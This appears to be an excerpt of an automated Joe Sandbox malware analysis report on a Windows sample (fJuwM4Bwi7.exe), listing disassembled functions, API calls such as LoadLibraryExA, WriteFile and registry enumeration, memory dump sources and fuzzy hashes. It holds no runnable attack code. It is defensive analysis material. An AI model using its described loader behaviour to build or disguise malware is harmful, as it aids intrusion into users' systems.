                                        control_flow_graph 759 401bb8-401bd0 call 4029e0 * 2 764 401bd2-401bd9 call 4029fd 759->764 765 401bdc-401be0 759->765 764->765 767 401be2-401be9 call 4029fd 765->767 768 401bec-401bf2 765->768 767->768 771 401bf4-401c08 call 4029e0 * 2 768->771 772 401c38-401c5e call 4029fd * 2 FindWindowExA 768->772 783 401c28-401c36 SendMessageA 771->783 784 401c0a-401c26 SendMessageTimeoutA 771->784 782 401c64 772->782 785 401c67-401c6a 782->785 783->782 784->785 786 401c70 785->786 787 402892-4028a1 785->787 786->787
                                        APIs
                                        • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C18
                                        • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C30
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: MessageSend$Timeout
                                        • String ID: !
                                        • API String ID: 1777923405-2657877971
                                        • Opcode ID: 223d8f7865d2b1dd0e95bc8f55079009c40be9e2a37a1be7db68750e4265ac19
                                        • Instruction ID: c8505a4ed1fbcfe48898eca751f608fe424cacc25c72cee6cab93c7adb8e4515
                                        • Opcode Fuzzy Hash: 223d8f7865d2b1dd0e95bc8f55079009c40be9e2a37a1be7db68750e4265ac19
                                        • Instruction Fuzzy Hash: 742190B1A44208BFEF41AFB4CD4AAAE7BB5EF40344F14453EF541B61D1D6B89A40E728
                                        Function 0040303A Relevance: 6.1, APIs: 4, Instructions: 108fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 0040304F
                                          • Part of subcall function 004031CC: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EA4,?), ref: 004031DA
                                        • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F52,00000004,00000000,00000000,?,?,?,00402ECB,000000FF,00000000,00000000), ref: 00403082
                                        • WriteFile.KERNELBASE(0040A8A0,0040FFD0,00000000,00000000,004128A0,00004000,?,00000000,?,00402F52,00000004,00000000,00000000,?,?), ref: 0040313C
                                        • SetFilePointer.KERNELBASE(00005963,00000000,00000000,004128A0,00004000,?,00000000,?,00402F52,00000004,00000000,00000000,?,?,?,00402ECB), ref: 0040318E
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: File$Pointer$CountTickWrite
                                        • String ID:
                                        • API String ID: 2146148272-0
                                        • Opcode ID: 24d90e6fe24fc4b927ba7929ca5aee42abf3264703176f7c86ada2f370568673
                                        • Instruction ID: 01a25493adf58fb9a894681412e440a2e883d4234beea4965eba9eb13e735820
                                        • Opcode Fuzzy Hash: 24d90e6fe24fc4b927ba7929ca5aee42abf3264703176f7c86ada2f370568673
                                        • Instruction Fuzzy Hash: CC414F725052019FDB10BF29EE849663BFCFB4431A715863BE810BA2E4D7389D52CB5E
                                        Function 00401F68 Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F93
                                          • Part of subcall function 0040501F: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405058
                                          • Part of subcall function 0040501F: lstrlenA.KERNEL32(00402C51,Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405068
                                          • Part of subcall function 0040501F: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll,00402C51,00402C51,Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll,00000000,00000000,00000000), ref: 0040507B
                                          • Part of subcall function 0040501F: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll), ref: 0040508D
                                          • Part of subcall function 0040501F: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004050B3
                                          • Part of subcall function 0040501F: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004050CD
                                          • Part of subcall function 0040501F: SendMessageA.USER32(?,00001013,?,00000000), ref: 004050DB
                                        • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FA3
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00401FB3
                                        • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040201D
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                        • String ID:
                                        • API String ID: 2987980305-0
                                        • Opcode ID: 8405f33e14f9c3f15d0e520106e072150188c144eaeb8d7ef96d34cccaac7bda
                                        • Instruction ID: 23a464ffe6ca8440643a385a127484fd4ee8ad6b227fb7efa4d26ad3fc5b3ac3
                                        • Opcode Fuzzy Hash: 8405f33e14f9c3f15d0e520106e072150188c144eaeb8d7ef96d34cccaac7bda
                                        • Instruction Fuzzy Hash: D7210872904211BACF107FA48E49A6E39B0AB44358F60823BF601B62D1D7BC4941AA6E
                                        Function 004031E3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00405FA1: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\fJuwM4Bwi7.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,77463410,004033C9), ref: 00405FF9
                                          • Part of subcall function 00405FA1: CharNextA.USER32(?,?,?,00000000), ref: 00406006
                                          • Part of subcall function 00405FA1: CharNextA.USER32(?,"C:\Users\user\Desktop\fJuwM4Bwi7.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,77463410,004033C9), ref: 0040600B
                                          • Part of subcall function 00405FA1: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,77463410,004033C9), ref: 0040601B
                                        • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77463410,004033C9), ref: 00403204
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: Char$Next$CreateDirectoryPrev
                                        • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 4115351271-1726532035
                                        • Opcode ID: ee23c129dd8a5d49f4f649e38bc420fd14e59507522fd77197c34cef7b8656a6
                                        • Instruction ID: 89773af62672bbf6302d30782f314b1c1bc42d6855f09756152acd8bf908297a
                                        • Opcode Fuzzy Hash: ee23c129dd8a5d49f4f649e38bc420fd14e59507522fd77197c34cef7b8656a6
                                        • Instruction Fuzzy Hash: 24D0C71290AD3066D5513B6A7C46FCF050C8F4675DF11807BF904751C58F6C555395EF
                                        Function 00406745 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fa6151eb6114a7c7dde5596e7ed141339a6810161cd6e35f889c2edb9118ca88
                                        • Instruction ID: d3f30c549e8eaa155af2d8805db43d359078549a114e1d1e4cfdde4495a9482f
                                        • Opcode Fuzzy Hash: fa6151eb6114a7c7dde5596e7ed141339a6810161cd6e35f889c2edb9118ca88
                                        • Instruction Fuzzy Hash: 13A14471E00228CBDF28DFA8C8447ADBBB1FB45305F15816ED816BB281D7785A96DF44
                                        Function 00406946 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e9dede487193b96133ea94438acbc75bab27e7ac1b94d370ef06066709f64446
                                        • Instruction ID: 66af66db22d428e7cee4185570621c0262e28a8f97ef0091af547b150b1cef7f
                                        • Opcode Fuzzy Hash: e9dede487193b96133ea94438acbc75bab27e7ac1b94d370ef06066709f64446
                                        • Instruction Fuzzy Hash: 7F912170E00228CBDF28DF98C8947ADBBB1FB45305F15816ED816BB281C7786A96DF44
                                        Function 0040665C Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d2d995426ddd841542114576c7cd3986778113386b5e0d0d2bb3b42046c5d03f
                                        • Instruction ID: 36158da5dd70985ab85e2c4d41886ca33cae813362c0b87a96f868d92fb05337
                                        • Opcode Fuzzy Hash: d2d995426ddd841542114576c7cd3986778113386b5e0d0d2bb3b42046c5d03f
                                        • Instruction Fuzzy Hash: 65815771D00228CFDF24CFA8C8847ADBBB1FB45305F25816AD816BB281D778A996DF15
                                        Function 00406161 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 68ae08bc292ff831ddf939399879833efa26d2e617e1386947dce183f6739e75
                                        • Instruction ID: 1715bfb1c3d5716620224504c503b3d15fe2aa0a2bbcc08a305e6ffc6cb4203b
                                        • Opcode Fuzzy Hash: 68ae08bc292ff831ddf939399879833efa26d2e617e1386947dce183f6739e75
                                        • Instruction Fuzzy Hash: 53817771D00228DBDF24CFA8C8447ADBBB0FB44301F2581AED856BB281D7786A96DF45
                                        Function 004065AF Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2929f55d3e8b81ac1e584e7399a4f2facda7d772583105b5c0ec75abe6cb9a93
                                        • Instruction ID: 032b7c8430df6362c90b97cb5f8c3133674bcd2d0f853081a3cdcc23126a0f5c
                                        • Opcode Fuzzy Hash: 2929f55d3e8b81ac1e584e7399a4f2facda7d772583105b5c0ec75abe6cb9a93
                                        • Instruction Fuzzy Hash: 87711371D00228CFDF24CF98C8847ADBBB1FB48305F15806AD816BB281D7785996DF45
                                        Function 004066CD Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 948a468c2091db2feb9fa4c22586628b65dd678cc983fa395508304452d62250
                                        • Instruction ID: 3e9dbefe820a1d4baf734be7fb741bb2fb66d8e6f9ed59188b506b6c9edb630d
                                        • Opcode Fuzzy Hash: 948a468c2091db2feb9fa4c22586628b65dd678cc983fa395508304452d62250
                                        • Instruction Fuzzy Hash: AB711371E00228CBDF28CF98C884BADBBB1FB44305F15816ED816BB281D7786996DF45
                                        Function 00406619 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2d63a3d575cf43ccaec2b316c623d79440d1cb8ee82c5371297a3fda91248972
                                        • Instruction ID: 1812ff5f5430a706778d8acc512246fd3c212bc7acfdfbe5d0fa3af8c8d1a12f
                                        • Opcode Fuzzy Hash: 2d63a3d575cf43ccaec2b316c623d79440d1cb8ee82c5371297a3fda91248972
                                        • Instruction Fuzzy Hash: AD712471E00228CBDF28DF98C844BADBBB1FB44305F15806ED856BB291C7786A96DF45
                                        Function 00402F1F Relevance: 4.6, APIs: 3, Instructions: 95fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetFilePointer.KERNELBASE(00409130,00000000,00000000,00000000,00000000,?,?,?,00402ECB,000000FF,00000000,00000000,00409130,?), ref: 00402F45
                                        • WriteFile.KERNELBASE(00000000,004128A0,?,000000FF,00000000,004128A0,00004000,00409130,00409130,00000004,00000004,00000000,00000000,?,?), ref: 00402FD2
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: File$PointerWrite
                                        • String ID:
                                        • API String ID: 539440098-0
                                        • Opcode ID: 41928112f34441f9b3539e2a42aa88ab340ce8e3764aaba8d566e6229e32b04b
                                        • Instruction ID: 3b6e370e410e3f669d4a968ba26e16673121f6254c39c59cd6eb20204b18cf3c
                                        • Opcode Fuzzy Hash: 41928112f34441f9b3539e2a42aa88ab340ce8e3764aaba8d566e6229e32b04b
                                        • Instruction Fuzzy Hash: 14313931502259FFDF20DF55DD44A9E3BA8EF04395F20403AF908A61D0D2789A41EBA9
                                        Function 0040218A Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040603A: FindFirstFileA.KERNELBASE(?,00421548,Invaliditetsprocent209\indoktrineringen.rec,004058F7,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,00000000,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,?,?,77462EE0,00405616,?,C:\Users\user\AppData\Local\Temp\,77462EE0), ref: 00406045
                                          • Part of subcall function 0040603A: FindClose.KERNEL32(00000000), ref: 00406051
                                        • lstrlenA.KERNEL32 ref: 004021CA
                                        • lstrlenA.KERNEL32(00000000), ref: 004021D4
                                        • SHFileOperationA.SHELL32(?,?,?,00000000), ref: 004021FC
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: FileFindlstrlen$CloseFirstOperation
                                        • String ID:
                                        • API String ID: 1486964399-0
                                        • Opcode ID: bca2972add9fd882f8e407e235b9fbbb20ab122dffcfd5b9ae2cbf6afbd38a77
                                        • Instruction ID: 8bd3c95f8033a3e017dea1ba9a61a5da7054b4883ba983d73c0c7a27e6e6bfe8
                                        • Opcode Fuzzy Hash: bca2972add9fd882f8e407e235b9fbbb20ab122dffcfd5b9ae2cbf6afbd38a77
                                        • Instruction Fuzzy Hash: 70115671E04319AADB00FFB5894999EB7F8EF10344F10853BA505FB2D2D6BCC9019B69
                                        Function 0040243A Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00402B07: RegOpenKeyExA.KERNELBASE(00000000,00000168,00000000,00000022,00000000,?,?), ref: 00402B2F
                                        • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402468
                                        • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 0040247B
                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nszBD12.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
